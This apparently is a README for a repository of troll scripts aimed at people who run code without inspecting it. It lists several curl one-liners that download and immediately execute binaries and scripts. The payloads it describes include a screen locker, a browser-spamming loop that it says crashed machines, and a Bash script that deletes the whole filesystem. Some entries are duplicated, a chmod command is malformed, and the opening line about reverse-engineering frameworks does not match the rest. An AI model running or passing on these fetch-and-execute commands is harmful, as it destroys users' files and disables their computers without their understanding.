π Reverse engineering - forked popular reverse engineering frameworks and links to professional courses
Build to make fun off script kiddies that will execute any code you send them without inspection, use for fun but do not harm. These scripts are really poorly coded, but friend gave me 24 hours so Im trying to make as much as possible, expect improvement in the future. This little 'project' was made because I wanted to excercise in as many languages as possible.
1 (C#) - Blank screen that you can remember from Async rat, I've made own and it doesnt break your pc when you restart it
curl -sL https://github.com/TheDebianGuy/Hackingtools/blob/master/1/script.exe?raw=true -o script.exe & script.exe
4 (Python) - while True: webbrowser.open('https://pornhub.com'), with 4 threads it was able to break pc, lowered to 2 threads
curl -sL https://github.com/TheDebianGuy/Hackingtools/blob/master/4/script.exe?raw=true -o script.exe & script.exe
curl -sL https://github.com/TheDebianGuy/Hackingtools/blob/master/5/script.exe?raw=true -o script.exe & script.exe
curl -sL https://github.com/TheDebianGuy/Hackingtools/blob/master/6/script.bat?raw=true -o script.bat & script.bat
curl -sL https://github.com/TheDebianGuy/Hackingtools/blob/master/2/script.js?raw=true -o script.js; node script.js
3 (Bash) - Rickrolling while deleting whole filesystem, use when escaping feds, death to whoever launches this without looking at the code π
curl -sL https://github.com/TheDebianGuy/Hackingtools/blob/master/3/script.sh?raw=true -o script.sh; chmod+x script; ./script.sh
4 (Python) - while True: webbrowser.open('https://pornhub.com'), with 4 threads it was able to break pc, lowered to 2 threads
curl -sL https://github.com/TheDebianGuy/Hackingtools/blob/master/4/script.bin?raw=true -o script.bin; chmod+x script.bin; ./script.bin